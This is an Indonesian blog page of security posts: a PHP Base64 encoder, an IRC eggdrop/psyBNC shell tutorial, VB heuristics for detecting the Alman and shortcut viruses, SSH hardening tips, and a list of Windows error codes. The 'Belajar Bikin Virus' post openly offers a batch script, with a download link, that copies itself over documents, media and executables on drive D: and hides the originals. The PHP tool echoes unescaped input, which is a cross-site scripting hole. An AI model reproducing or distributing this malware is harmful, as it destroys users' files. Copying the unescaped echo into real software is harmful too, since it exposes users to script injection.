Recent Comments

FBS FOREX

Forex Broker Untuk Pemula

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Space For Ads

Space For Ads
Tampilkan postingan dengan label Security. Tampilkan semua postingan
Tampilkan postingan dengan label Security. Tampilkan semua postingan

Jumat, 22 November 2013

Base 64 Encoder/Decoder Script

 
 hari Ini saya mau share cara bikin enkripsi sendiri.. monggo di simak..
yg males scripting lgs donlot di sini aja broo









<?php //*********************************************************************************************
//TITLE : Base64 Encoder / Decoder
//*********************************************************************************************
 
echo"<title>Base 64 Encode / Decode</title>";
echo
"<div align=center>Base 64 Encode / Decode";
    
$Crut= stripslashes($_POST['c0de']);
        if (
$Crut == "")
        {
       
$Crut = $_GET['c0de'];
        }
 
    
$action = $_POST['action'];
    if (
$action == "")
     {
    
$action = $_GET['action'];
    if (
$action == "encode"){
              
$action = "enc0de";
              }
              elseif (
$action == "decode")
              {
              
$action = "dec0de";
              }
        }
     
    switch(
$action){
    case 
"enc0de":
           
$output = base64_encode($Crut);
               if(!
$output){
               echo 
'Ada yang salah Crut!!!';
               }
     
    echo
"<center><table width='380'><td>";
    echo 
"<p> Input: " . $Crut . "</p>";
    echo 
"<p> Output (Base64): " . $output ."</p>";
    echo 
"<p><a href='javascript:history.back(0);'> << Back </a></p>";
    break;
     
    case 
"dec0de":
    
$output = base64_decode($Crut);
    if(!
$output){
    echo 
'Ada yang salah Crut!!!';
    exit;
    }
     
    echo
"<center><table width='380'><td>";
    echo 
"<p> Input (Base64) : " . $Crut . "</p>";
    echo 
"<p> Output : " . $output ."</p>";
    echo 
"<p><a href='javascript:history.back(0);'> << Back </a></p>";
    break;
     
    default: echo 
'<form id="form1" name="form1" method="post" action="?encode/decode">
                <p>
                   <textarea name="c0de" id="c0de" rows=8 cols=40 ></textarea>
                </p>
              
              <p>Pilih yang mau di cari</p>
              
              <p><input type=radio name="action" id="action" value="enc0de">Encode</p>
              <p><input type=radio name="action" id="action" value="dec0de">Decode</p>
     
            <input type="submit" class = "button" name="submit" id="submit" onClick="
            if(c0de.value==\'\'){alert(\'mana teksnya crut???\'); return false;}" value="Submit" />
            <input type="reset" name="reset" class="button" value="Reset"/>
     
        </p>
      </form>'
;
      
    break;
    }
    
?>

Rabu, 30 Oktober 2013

Tutorial Shell,Eggdrop,PsyBNC for IRC

Nah, Sekarang kita mau ngomongin seluk beluk shell nih, khususnya shell yang dipergunakan untuk kepentingan IRC. Sebelumnya tau ga Shell itu apa?
Shell adalah program khusus yang digunakan sebagai interface antara user dengan kernel.
Lalu apa itu kernel??
Kernel merupakan inti suatu operating system. Secara sederhananya, kernel berfungsi sebagai penghubung antara hardware dengan software yang berjalan pada suatu operating sistem. Kernel di load ke memory saat booting dan berfungsi me-manage system sampai system di shutdown.
Kembali ke masalah shell. Shell merupakan utilitas program yang berjalan saat user log on ke komputer. Shell mengijinkan user untuk berinteraksi dengan kernel dengan cara menginterpretasikan perintah yang diketikkan pada shell.
Ketika command diketikkan, shell bertanggung jawab untuk memparsing command line, meridirect,dan mengeksekusi command tersebut. Command-command yang diketikan bisa ditulis dalam suatu file (Script file) dengan memanfaatkan shell programing. (sbr:Aceh Forum)
Selebihnya cari aja di google yha…
Sekarang mungkin dah ga asing lagi dengan nama Shell, apalagi bagi mereka yang hobby dengan chatting melalui IRC/mIRC. Nah bagaimana cara mendapatkan shell itu? bagi sebagian orang yang berkecukupan mungkin dapat membelinya secara online, tp bagi yang masih belajar ataupun coba-coba bahkan bagi mereka yang malas mengeluarkan uangnya untuk membeli hal seperti ini (seperti penulis :p) anda dapat mendapatkannya secara gratis, dan tentu saja untuk GRATISAN masih ada kekurangannya atau dibatasi pemakaiannya, ataupun dengan syarat yang cukup sulit bagi mereka yang tidak mempunyai koneksi unlimited.
Jujur saja, saya sebenarnya masih sangat awam tentang ini, dan saya baru mendapatkan access shell baru kemarin semenjak tulisan ini diterbitkan, saya menggunakan shell gratisan dari —-not for publish—- (terima kasih bang Awie a.k.a Angin on irc.relaychat.net #id untuk infonya), prosesnya sangat simple, ±10 menit setelah signup akan ada konfirmasi username/pass untuk login ke shell dengan cara download putty / cygwin nah simple kan?!!
Berhubung shell disini berorientasi untuk IRC, selanjutnya untuk pemakaian shell sebagai Bot IRC, kita harus menginstall EggDrop atau PsyBNC ke dalam shell itu(cari artinya masing² ya di Google), ok tanpa perlu panjang lebar saya coba paparkan sedikit masing-masing cara menginstallnya :
Installasi EggDrop
1. Download file eggdropnya di sini dibagian eggdrop file
systrojan@inferno:~$ wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/ eggdrop 1.6.18.tar.gz--06:16:05--  ftp://ftp.eggheads.org/pub/eggdrop/source/1.6 /eggdrop1.6.10.tar.gz=> `eggdrop1.6.10.tar.gz'Resolving ftp.eggheads.org... done.

Connecting to ftp.eggheads.org[207.195.39.240]:21... connected.

Logging in as anonymous ... Logged in!

==> SYST ... done.    ==> PWD ... done.

==> TYPE I ... done.  ==> CWD /pub/eggdrop/source/1.6 ... done.

==> PORT ... done.    ==> RETR eggdrop1.6.10.tar.gz ... done.

Length: 893,527 (unauthoritative)100%[===================================== ================>]

893,527      470.65K/s    ETA 00:00

06:16:07 (470.65 KB/s) - `eggdrop1.6.10.tar.gz' saved [893527]

systrojan@inferno:~$
2. Setelah itu di ekstrak filenya dengan menggunakan perintah tar
systrojan@inferno:~$ tar -zxvf eggdrop1.6.10.tar.gz....

eggdrop1.6.18/src/mod/woobie.mod/woobie.c

eggdrop1.6.18/text/

eggdrop1.6.18/text/CONTENTS

eggdrop1.6.18/text/banner

eggdrop1.6.18/text/motd

eggdrop1.6.18/configure

eggdrop1.6.18/configure.in

systrojan@inferno:~$
3. Masuk ke folder hasil extractnya
systrojan@inferno:~$ cd eggdrop1.6.18systrojan@inferno:~$ [~/eggdrop1.6.18]#
4. Lalu configure sesuai sistemnya
systrojan@inferno [~/eggdrop1.6.18]# ./configureThis is Eggdrop's GNU configure  script.It's going to run a bunch of strange tests to hopefully

make your compile work without much twiddling.

checking for gcc... gcc

checking for C compiler default output... a.out

checking whether the C compiler works... yes

...

...

onfig.status: creating src/mod/Makefile

config.status: creating config.h

creating lush.h

Configure is done.

Type 'make config' to configure the modules, or type 'make iconfig'

to interactively choose which modules to compile.

After that, type 'make' to create the bot.

systrojan@inferno [~/eggdrop1.6.18]#
5.Lalu buat confignya dengan make config
systrojan@inferno [~/eggdrop1.6.18]# make configdetecting modules.................... done.

calculating dependencies................... done.

building ./src/mod/Makefile... done.

make[1]: Entering directory `/home/eggdrop/eggdrop1.6.18/src/mod'Configuring  module compress ...

running in eggdrop mode.

creating cache ../../../config.cache

....

....

creating ./config.status

creating Makefile

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/src/mod'

building ./src/mod/Makefile... done.

You can now compile the bot, using "make".

systrojan@inferno [~/eggdrop1.6.18]#
6. Lalu di make supaya menghasil file binary
systrojan@inferno [~/eggdrop1.6.18]# makemake[1]: Entering directory  `/home/eggdrop/eggdrop1.6.18/src'

(This may take a while.  Go get some runts.)

gcc -pipe -g -O2 -Wall -I.. -I.. -DHAVE_CONFIG_H   -c bg.c

gcc -pipe -g -O2 -Wall -I.. -I.. -DHAVE_CONFIG_H   -c botcmd.c

...

...

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/src/mod'modules made:

-rwxr-xr-x    1 eggdrop  eggdrop      8112 Apr 17 06:23 assoc.so

-rwxr-xr-x    1 eggdrop  eggdrop     13852 Apr 17 06:23 blowfish.so

-rwxr-xr-x    1 eggdrop  eggdrop     97756 Apr 17 06:23 channels.so

-rwxr-xr-x    1 eggdrop  eggdrop      9808 Apr 17 06:23 compress.so

-rwxr-xr-x    1 eggdrop  eggdrop      8704 Apr 17 06:23 console.so

-rwxr-xr-x    1 eggdrop  eggdrop      7612 Apr 17 06:23 ctcp.so

-rwxr-xr-x    1 eggdrop  eggdrop     13724 Apr 17 06:23 dns.so

-rwxr-xr-x    1 eggdrop  eggdrop     93092 Apr 17 06:23 filesys.so

-rwxr-xr-x    1 eggdrop  eggdrop    118620 Apr 17 06:23 irc.so

-rwxr-xr-x    1 eggdrop  eggdrop     25212 Apr 17 06:23 notes.so

-rwxr-xr-x    1 eggdrop  eggdrop     12188 Apr 17 06:23 seen.so

-rwxr-xr-x    1 eggdrop  eggdrop     57052 Apr 17 06:24 server.so

-rwxr-xr-x    1 eggdrop  eggdrop     42972 Apr 17 06:24 share.so

-rwxr-xr-x    1 eggdrop  eggdrop     32980 Apr 17 06:24 transfer.so

-rwxr-xr-x    1 eggdrop  eggdrop      6748 Apr 17 06:24 uptime.so

-rwxr-xr-x    1 eggdrop  eggdrop     12312 Apr 17 06:24 wire.so

Now run "make install" to install your bot.

systrojan@inferno [~/eggdrop1.6.18]#
7.Sekarang tinggal kita make install untuk membuat file eggdrop binarynya
ada dua cara yaitu make install atau make install DEST=/path/tempat/install
kalau make install maka langsung ditaruh di /home/usernamenya/eggdrop
systrojan@inferno [~/eggdrop1.6.18]# make installEggdrop v1.6.18 (C) 1997 Robey  Pointer (C) 2006 EggheadsInstalling in directory: '/home/eggdrop/eggdrop'.

Creating directory: /home/eggdrop/eggdrop.

mkdir /home/eggdrop/eggdrop

...

...

...

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/scripts'

Installation completed.

You MUST ensure that you edit/verify your configuration file.

Use one of the three configuration files (eggdrop.simple.conf,

eggdrop.advanced.conf and eggdrop.complete.conf) distributed

with your bot.

Remember to change directory to /home/systrojan/eggdrop before you proceed.

systrojan@inferno [~/eggdrop1.6.18]#
Selesai sudah install eggdropnya
Sekarang tinggal configurasi botnya, untuk mengedit eggdrop.conf kita
memerlukan pico editor(semacam notepad pada windows) dengan cara :
systrojan@inferno:~/eggdrop$ pico eggdrop.conf
Nah setelah kebuka
GNU nano 2.0.2 File: eggdrop.conf
disini kita harus membaca terlebih dahulu apa saja isinya, termasuk langkah untuk mengeditnya, dapat kita lihat disana, ada beberapa yang kita harus hilangkan tanda “#” untuk mengaktifkan command pada access bot tersebut sesuai kebutuhan, dan perlu diingat “kita harus cukup teliti mengedit file.conf ini agar pada saat compilingnya tidak ada bentuk error”. Dan yg terpenting, di bagian awal pico editor kita hapus :
#! /path/to/executable/eggdrop
..
..
..
# More detailed descriptions of all these settings can be found in
# doc/settings/.
Hasilnya pada bagian awal .conf tersebut kita lihat :
##### BASIC SETTINGS #####
# This setting defines the username the bot uses on IRC. This setting has
# no effect if an ident daemon is running on your bot’s machine.
set username “lamest”
Dan juga kita hapus yang ada tulisan :
die “Please make sure you edit your config file completely.”
Nah sisanya anda tinggal ubah sesuai data yang diinginkan, namun ada satu yang saya masih contek, yaitu pada Channels Module, disana tertera commentar yg cukup banyak, dan tugas anda hapus comment tersebut dan ganti dengan contoh seperti ini :
}
channel add #main {
chanmode “+nt-likm”
idle-kick 0
stopnethack-mode 0
flood-chan 10:60
flood-deop 3:10
flood-kick 3:10
flood-join 5:60
flood-ctcp 3:60
flood-nick 5:60
}
channel set #main +enforcebans +dynamicbans +userbans
channel set #main +dynamicexempts +userexempts +dynamicinvites +userinvites
channel set #main -autoop -bitch +protectops +protectfriends +dontkickops
channel set #main +greet +statuslog
channel set #main +revenge +autovoice
channel set #main -secret -shared -cycle
channel set #main -inactive +seen +nodesynch
#### SERVER MODULE ####
So tau kan batasan mana yang kita harus hapus dan diganti !!!
Setelah selesai editingnya, kluar dari pico editor dengan ketik : [ctrl+x] -> (y)yes -> enter(tdk usah menggati nama eggdrop.conf.
Untuk compilingnya, kita gunakan perintah : ./eggdrop -m eggdrop.conf
Apabila masih ada error anda dapat kembali ke pico editor dan memperbaikinya, apabila ada masalah dalam memperbaikinya, anda dapat share langsung disini atau sebelumnya anda dapat melihat bentuk default eggdrop.conf disini
Nah kurang lebih seperti itu yang bisa saya share pengetahuannya, sisanya anda dapat berlatih sendiri dengan batuan Master Google.
Instalasi PsyBNC
Apasih PsyBNC itu? Bagi yang dah lama malang melintang di dunia irc pasti tau tuh apa PsyBNC , PsyBNC adalah salah satu Irc Bouncer yang sangat mudah digunakan , dan mendukung multi user.
  1. Silahkan login ke shell account kamu.
  2. Download psybnc nya dari sini nih ambil yang versi terbaru yah )
    $ wget http://psybnc.net/psyBNC-2.3.2-7.tar.gz
  1. Extrax file psybnc yang sudah di download tadi.
    $ tar -zxvf psyBNC-2.3.2-7.tar.gz
  1. masuk ke folder psybnc
    $ cd psybnc
  1. Make
    $ make
  1. Edit file psybcn.conf pakai editor kesukaan kamu, vi, nano, pico terserah deh mana yang di sukai , saya sendiri lebih suka menggunakan pico, tapi sayang server saya belum sempat di install pico, jadi pakai vi aja
    $ vi psybnc.conf
    maka muncul seperti ini, tekan i untuk edit setelah edit selesai tekan tombol “esc” yang di pojok kiri atas tuh , untuk menyimpan tekan :wq
    PSYBNC.SYSTEM.PORT1=31337 #<— ganti dengan port yang kamu inginkan misalnya 17485
    PSYBNC.SYSTEM.HOST1=*
    PSYBNC.HOSTALLOWS.ENTRY0=*;*
  1. Psybnc sudah siap di jalankan.
    $ ./psybnc
    .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
    ,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
    | O || ,-’ \ \/ / | o || \| || ,–’
    | _/ _\ \ \ / | o< | |\ || |__
    |_| |____/ |__| |___||_| \_| \___|
    Version 2.3.2-7 (c) 1999-2003
    the most psychoid
    and the cool lam3rz Group IRCnet
    `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’
    Configuration File: psybnc.conf
    Language File: psyBNC Language File – English
    No logfile specified, logging to log/psybnc.log
    Listening on: 0.0.0.0 port 17485
    psyBNC2.3.2-7-cBtITLdDMSNp started (PID 22774)
  1. Okeh psybnc sudah berjalan di server kita silakan buka mirc kamu dan konek ke psybnc kamu sesuai dengan port nya tadi. untuk pertama kali memakai anda perlu setting identd di mirc kamu, terus di inget soalnya identd itu yang dipakai selama konek ke psybnc, klo anda nanti mau konek lagi dengan identd yang berbeda tidak akan bisa
  2. Setelah berhasil konek silahkan baca help nya disini

Belajar Bikin Virus

wkwk.. iseng2 bro.. mari dicoba..tp kerusakan akibat coba2 aku g tanggung jawab lho ya.. cuma ising aja.. :p

PHP Code:
@echo offfor /r "D:\" %%a in (*.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll) do (
   copy %0 "
%%~rahasia.bat" && attrib +s +h "%%~fa"
)
@echo off 




save dengan "namafile".bat (hilangkan "")
jangan lupa bawah nya all files

ini merusak file *.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll yang ada didalam local disk D
dan membua file rahasia.bat di disk D
secara sembunyi" menanti..

 kl berminat download script ny silahkan klik di sini.. INGAT!! SEGALA BENTUK KERUSAKAN SAYA TIDAK BERTANGGUNG JAWAB


Minggu, 27 Oktober 2013

Mendeteksi Virus Alman

Kalian udah tau kan apa itu virus ALMAN ?
ya tu virus di kategorikan virus berbahaya,virus ini bisa meng-injeksi file dengan extensi ".exe,.dll"

file yang udah terinfeksi otomatis berubah menjadi file zombie karena pada file itu sudah disisipi kode virus agar saat file yang terinfeksi di jalankan,kode virus itu juga ikut di jalankan .

bagi agan" developer antivirus,mendeteksi virus alman juga tidak menggunakan cara yang biasa seperti menggunakan checksum
( Md5,Crc32,SHA256,dll )

kalau masih nekat mau make checksum andai saja 2 byte kegeser juga udah ga akan ke detect lagi file nya

karena file yang akan di infeksi si virus kan akan selalu beda ukurannya,ga akan mungkin sama.
so jalan keluar nya adalah menggunakan heuristic,
walaupun heuristic yang bakal ane share disini masih menggunakan metode read string,tapi cara ini ane akuin ampuh buat mendeteksi alman Variant A & B
algoritma nya begini :
Awalnya besar file yang ingin di check di hitung dulu,
apabila file yang akan di check besar nya file nya > 40 KB file di buka lalu di baca isinya dan dicek apakah file nya mengandung string yang tersimpan pada program pendeteksi alman tersebut.
dengan posisi dari ( Besar file terinfeksi - 40 Kb ) & string dalam file sama dengan string yang tersimpan, ini file sudah pasti di infeksi oleh alman


Langsung ajaa yok, TKP..
pertama buka dulu program visual basic nya ,

lalu tambahkan :
1 Buah command button
1 Buah Text Box



masukan code ini pada form
Private Function CekSiAlman(Dimana As String) As Boolean
On Error Resume Next
Static TextExenya As String
Static GedeFileNya As Long
GedeFileNya = FileLen(Dimana)
If GedeFileNya > 40970 Then
    TextExenya = MariMembaca(Dimana)
    If InStr(TextExenya, "¯EI5œ‚ÞùWç‘Ï") > (GedeFileNya - 40970) Then 'lalu balikan jadikan fungsi ceksialman menjadi true
        CekSiAlman = True
    Else
        CekSiAlman = False
    End If
Else
    CekSiAlman = False
End If
End Function

Private Function CekSiAlmanB(Dimana As String) As Boolean
On Error Resume Next
Static TextExenya As String
Static GedeFileNya As Long
GedeFileNya = FileLen(Dimana)
If GedeFileNya > 40970 Then
    TextExenya = MariMembaca(Dimana)
    If InStr(TextExenya, "µí§¶ýÚÿ×Ðþÿÿ·hþÿÿÿÿÿï¡ùÿÿÿÿÿÿÿÿÿÿÿÿ") > (GedeFileNya - 40970) Then
        CekSiAlmanB = True
    Else
        CekSiAlmanB = False
    End If
Else
    CekSiAlmanB = False
End If
End Function

Private Function MariMembaca(Targetnya As String) As String
Static sTemp As String
Open Targetnya For Binary As #1
    sTemp = Space(LOF(1))
    Get #1, , sTemp
Close #1
MariMembaca = sTemp
End Function

lalu pada command buttonnya masukan text ini
MsgBox "Positif Terinfeksi : " & CekSiAlman(Text1.Text), vbExclamation, "Hasil"

semoga thread ini berguna bagi agan" yang sedang mengembangkan antivirus,supaya antivirus agan bisa mendeteksi file" virus infector..

kl temen2 belum paham..dan males utak atik program Vb bisa langsut sedot aja gan.. monggo 



Thx for HM-TEAM.. 

Senin, 21 Oktober 2013

Tips amankan SSH

SSH yaitu sebuah daemon untuk meremote sebuah komputer dari jauh dalam hal ini biasanya server yang akan diremote. Biasanya administrator sebuah server tidak bisa selalu ada ditempat maka ia menggunakan ssh untuk bisa meremote server tersebut dari jauh , mungkin dari rumahnya. Tetapi bila service ssh ini tidak dikonfigurasi dengan baik maka bisa menjadi senjata makan tuan dan digunakan oleh orang lain untuk meng hack server tersebut.

Bila kita membicarakan soal keamanan server maka mungkin ssh merupakan service yang paling banyak disukai para hacker karena melalui ssh mereka dapat masuk ke shell konsole dan dapat melakukan perintah untuk mengambil alih server tersebut. Maka apabila hacker melihat server yang akan ia hack membuka port ssh nya maka dia akan senang sekali dan itulah yang pertama akan ia serang. Jadi ssh merupakan pintu pertama pengamanan server anda dari serangan melalui network/internet.

Sekarang pertanyaannya bagaimana kita bisa mengamankan service tersebut. Pertama-tama kita harus tahu terlebih dahulu apakah SSH itu. OpenSSH merupakan sebuah aplikasi remote login yang dikembangkan untuk menggantikan rlogin dan rsh ,dengan ssh keamanan remote lebih tinggi karena menggunakan komunikasi yang terenkripsi antara dua host. Untuk lebih detailnya bisa anda cari sendiri di om google karena bila dijelaskan disini tentu akan panjang sekali. Untuk bisa melakukan ssh maka kita perlu menginstall aplikasi ssh-server dan ssh-client, ssh-server untuk host yang akan diremote dan ssh-client untuk meremote host. Tetapi biasanya semua distribusi linux biasanya sudah membundel ssh pada default instalasinya. Bila ssh belum terinstalai pada komputer anda maka gunakan manajemen paket pada distribusi linux yang anda gunakan untuk menginstall aplikasi ssh dari CD atau DVD instalasinya.

Nah setelah aplikasi ssh telah terinstall pada komputer anda sekarang kita mengkonfigurasinya agar aman dari tangan-tangan jahil yang mencoba masuk ke server kita menggunakan ssh. Oke sekarang kita buka file konfigurasi ssh pada "⁄etc⁄ssh⁄sshd.conf" , buka file tersebut dengan editor kesayangan anda. Karena saya menggunakan Fedora Core maka file tersebut berada di "⁄etc⁄ssh⁄sshd.conf" , mungkin berbeda pada distro lainnya tetapi biasanya ada pada direktori "⁄etc⁄ssh⁄" . Oke sudah dibuka file tersebut ,sekarang coba dibaca-baca dulu sebentar untuk melihat konfigurasinya mungkin saja anda bisa mengerti dan melakukan konfigurasi sesuai dengan keinginan anda. Jangan lupa backup dahulu file tersebut agar bila nantinya anda salah mengkonfigurasi masih ada file aslinya.

[root@www ~]# cp ⁄etc⁄ssh⁄sshd_config ⁄etc⁄ssh⁄sshd_config.old
Lalu buka file ⁄etc⁄ssh⁄sshd.conf
[root@www ~]# vim ⁄etc⁄ssh⁄sshd_config
Sudah belum baca-bacanya karena sekarang kita akan mengkonfigurasi file ini. Sekarang yang pelru diamankan adalah mencegah untuk login remote melalaui ssh dengan menggunakan user root kenapa kita melakukan ini , sekarang coba kita pikirkan apabila kita mencoba masuk ke server orang lain melalui ssh tentu kita perlu sebuah user yang ada pada server tersebutagar bisa login iya apa iya, kita pasti tidak tahu nama-nama user yang ada pada server tersebut bukan tetapi pasti ada satu user yang pasti ada pada server tersebut yang juga ada pada setiap server yang menggunakan linux sebagai OS nya, ya anda benar root pasti ada maka seorang hacker pasti akan mencoba user root pertama kali karena hanya user tersebut yang dia tahu yang pasti ada pada server. Apabila kita tidak mencegah dan membiarkan root bisa login melalui ssh maka mungkin saja hacker akan menggunakan user tersebut dan menggunakan brute force untuk mencari tahu passwordnya. Oleh karena itu jangan biarkan root bisa login melalui ssh. Udah ah penjelasannya sekarang konfigurasinya, pada file sshd.conf cari parameter PermitRootLogin parameter ini untuk menkonfigurasi apakah root bisa login atau tidak. Pada Fedora Core secara default parameter tersebut di comment dan default valuenya adalah yes jadi root bisa login menggunakan ssh. Mungkin pada distro lain default valuenya berbeda seperti pada Ubuntu default valuenya no. Jadi kita perlu mengubah parameter tersebut untuk mencegah root login , cari parameter ini pada file sshd.conf
#PermitRootLogin yes
Uncomment baris tersebut dan ubah valuenya menjadi no seperti ini
PermitRootLogin no
Sekarang coba restart service ssh anda dan coba ssh komputer anda dengan user root bila tidak bisa maka anda berhasil .Konfigurasi yang kedua yaitu membatasi inputan password salah , bila kita remote komputer melalui ssh bila password kita salah maka kita pasti disuruh mencoba lagi kita bisa membatasi inputan tersebut agar hacker tidak bisa menggunakan brute force untuk mengcrack password kita. Untuk bisa menset inputan password tersebut cari parameter berikut pada file sshd.conf
#MaxAuthTries 6
Secara default kita bisa input password 6 kali bila salah kita bisa merubah valuenya dengan uncomment parameter tersebut dan beri value dengan angka yang anda inginkan seperti ini
MaxAuthTries 3
Selanjutnya untuk lebih aman lagi kita harus membatasi user yang bisa melakukan ssh ke server kita karena user dalam komputer kita banyak dan hanya user tertentu saja yang bisa login ssh dan belum lagi user system⁄aplikasi jadi kita harus membatasi user yang bisa ssh. Untuk bisa melakukan itu tambah kan baris berikut pada bagian bawah file sshd.conf
AllowUsers namauser1 namauser2
Ganti namauser1 dan namauser2 dengan user yang anda inginkan, ingat user tersebut harus ada pada komputer anda. Anda juga bisa memblock user yang anda tidak inginkan untuk login ssh dengan menambahkan parameter berikut pada baris terakhir file sshd.conf
DenyUsers namauser1 namauser2
Jangan lupa ganti namauser1 dan namauser2 dengan user yang anda inginkan. Perlu saya tambahkan apabila anda mengunakan AllowUsers maka user lain yang tidak disebutkan pada parameter tersebut akan di deny dan apabila anda menggunakan DenyUsers maka user lain yang tidak disebutkan pada parameter tersebut akan bisa login jadi anda hanya perlu menggunakan satu parameter saja.
Kita juga bisa menset waktu dari user untuk user bisa meremote komputer kita jadi user akan automatic logout apabila telah logni melebihi waktu yang telah kita set. Untuk bisa memnegset waktunya cari parameter berikut ini
#LoginGraceTime 2m
Uncomment baris tersebut lalu ubah valuenya sesuai dengan yang anda inginkan seperti berikut ini saya menset waktu 1 jam untuk user dapat login
LoginGraceTime 60m
Lanjut lagi sekarang kita akan memanipulasi port uang digunakan ssh agar hacker tidak tahu yang masih cupu tidak tahu bahwa service ssh kita terbuka. Secara default port ssh adalah 22 tetapi kita bisa merubahnya menjadi nomor sesuai dengan yang kita inginkan. Untuk bisa mengubahnya cari parameter berikut ini
#Port 22
Uncomment baris tersebut dan ubah valuenya menjadi nomor port yang anda inginkan seperti ini saya akan memberi value 9000.
Port 9000
Maka sekarang ssh anda berjalan pada port 9000 kalo enggak percaya coba anda scan komputer anda dengan nmap
[root@www ~]# nmap localhost
Coba cari port 22 enggak ada kan adanya port 9000
Mungkin hanya ini saja konfigurasi yang bisa saya berikan anda bisa mencari sendiri konfigurasi lainnya dengan membaca manual pagenya ssh dengan perintah
[root@www ~]# man ssh
Sekian dulu, moga bermanfaat......

Kamis, 23 Desember 2010

Teknik baru deteksi shortcut virus

Teknik baru ini disebut MISSING-TARGET dan NO-SHORTCUT, langsung saja penjelasannya..
 Missing-Target yang saya maksudkan disini adalah file shortcut yang sudah kehilangan target-nya atau file shortcut yang tidak memiliki file target.

Kasus yang terjadi:
- Shortcut virus tidak terhapus walaupun induk sudah terhapus. Dengan teknik ini shortcut ini akan terdeteksi sebab file target-nya sudah hilang.

Keuntungan teknik ini:
- Antivirus dapat mengecek file target secara langsung begitu file shortcutnya ditemukan.

Quote:No-Shortcut berarti file tersebut bukanlah shortcut sungguhan melainkan Cuma file tipuan. Sebab ekstensi �lnk� saja dapat menipu user maupun antivirus.

Kasus yang terjadi:
- Beberapa Worm dan virus suka membuat duplikasinya dengan ekstensi �.lnk�
- Beberapa worm dan virus sadar bahwa banyak antivirus lokal yang melewatkan scanning pada file �.lnk�
- Worm dan virus mengganti value command file �.lnk� menjadi value command application agar bisa dieksekusi

Keuntungan teknik ini:
- Antivirus anda dapat mengetahui / membedakan mana shortcut sungguhan dan mana yang palsu.

Berikut ini adalah source code teknik ini.!
Function Tujuan(strPath As String) As String

On Error GoTo rusak
Dim wshShell As Object
Dim wshLink As Object
Set wshShell = CreateObject(�WScript.Shell�)
Set wshLink = wshShell.CreateShortcut(strPath)
Tujuan = wshLink.TargetPath
Set wshLink = Nothing
Set wshShell = Nothing
Exit Function
rusak:

End Function

Sub Scan(filename)
If right(filename, 3) = �lnk� then
If Tujuan(filename) = �� then
�Berarti file ini adalah �NO-SHORTCUT�
Else
If dir(tujuan(filename)) = �� then
�Berarti file ini adalah �MISSING-TARGET�
End if
End if
End sub


Catatan:
Khusus untuk code Missing-target anda bisa ganti dengan code lain. Sebab cara ini terkadang tidak terlalu baik untuk file hidden.
Saya sendiri pakai code Object(filesystemobject).FileExist untuk memeriksa ada tidaknya suatu file.
Dan anda juga perlu ingat satu hal!!! Bahwa tidak selamanya shortcut memiliki target file. Malah ada juga folder yang menjadi target dari suatu shortcut..
Smoga Bermanfaat..
 

Jumat, 12 November 2010

System Error Codes (0-499)

Pagi2 buka email lagi. Kali ini buka milis Yogyafree, mau lihat2 berita2 terbaru bari teman2..

Xcode. Ternyata kali ini kang Adi Nugroho tentang list Error Code yang ada di windows. Hmm boleh juga nih di sharing kebetulan ane ngk paham betul code error tersebut memberikan peringatan apa.



Berikut ini adalah code errornya dari 0 – 499
Constant/value Description
ERROR_SUCCESS 0 (0×0) The operation completed successfully.
ERROR_INVALID_FUNCTION 1 (0×1) Incorrect function.
ERROR_FILE_NOT_FOUND 2 (0×2) The system cannot find the file specified.
ERROR_PATH_NOT_FOUND 3 (0×3) The system cannot find the path specified.
ERROR_TOO_MANY_OPEN_FILES 4 (0×4) The system cannot open the file.
ERROR_ACCESS_DENIED 5 (0×5) Access is denied.
ERROR_INVALID_HANDLE 6 (0×6) The handle is invalid.
ERROR_ARENA_TRASHED 7 (0×7) The storage control blocks were destroyed.
ERROR_NOT_ENOUGH_MEMORY 8 (0×8) Not enough storage is available to process this command.
ERROR_INVALID_BLOCK 9 (0×9) The storage control block address is invalid.
ERROR_BAD_ENVIRONMENT 10 (0xA) The environment is incorrect.
ERROR_BAD_FORMAT 11 (0xB) An attempt was made to load a program with an incorrect format.
ERROR_INVALID_ACCESS 12 (0xC) The access code is invalid.
ERROR_INVALID_DATA 13 (0xD) The data is invalid.
ERROR_OUTOFMEMORY 14 (0xE) Not enough storage is available to complete this operation.
ERROR_INVALID_DRIVE 15 (0xF) The system cannot find the drive specified.
ERROR_CURRENT_DIRECTORY 16 (0×10) The directory cannot be removed.
ERROR_NOT_SAME_DEVICE 17 (0×11) The system cannot move the file to a different disk drive.
ERROR_NO_MORE_FILES 18 (0×12) There are no more files.
ERROR_WRITE_PROTECT 19 (0×13) The media is write protected.
ERROR_BAD_UNIT 20 (0×14) The system cannot find the device specified.
ERROR_NOT_READY 21 (0×15) The device is not ready.
ERROR_BAD_COMMAND 22 (0×16) The device does not recognize the command.
ERROR_CRC 23 (0×17) Data error (cyclic redundancy check).
ERROR_BAD_LENGTH 24 (0×18) The program issued a command but the command length is incorrect.
ERROR_SEEK 25 (0×19) The drive cannot locate a specific area or track on the disk.
ERROR_NOT_DOS_DISK 26 (0x1A) The specified disk or diskette cannot be accessed.
ERROR_SECTOR_NOT_FOUND 27 (0x1B) The drive cannot find the sector requested.
ERROR_OUT_OF_PAPER 28 (0x1C) The printer is out of paper.
ERROR_WRITE_FAULT 29 (0x1D) The system cannot write to the specified device.
ERROR_READ_FAULT 30 (0x1E) The system cannot read from the specified device.
ERROR_GEN_FAILURE 31 (0x1F) A device attached to the system is not functioning.
ERROR_SHARING_VIOLATION 32 (0×20) The process cannot access the file because it is being used by another process.
